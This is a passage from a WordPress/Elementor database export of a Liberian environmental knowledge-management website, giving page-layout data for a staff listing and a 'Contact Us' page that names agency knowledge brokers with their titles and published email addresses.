\\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23507,3420,'_elementor_edit_mode','builder'),(23508,3420,'_elementor_template_type','wp-page'),(23509,3420,'_elementor_version','3.0.16'),(23510,3420,'_wp_page_template','default'),(23511,3420,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager-CCCD Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>MOCI<br \\/>Bureau of Industrial Services<br \\/><a 